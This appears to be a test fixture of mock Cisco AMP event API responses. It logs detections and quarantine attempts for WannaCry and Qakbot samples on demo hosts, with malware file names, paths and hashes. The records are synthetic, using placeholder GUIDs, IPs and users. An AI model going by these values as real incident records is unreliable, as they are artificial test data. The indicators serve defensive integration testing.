+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
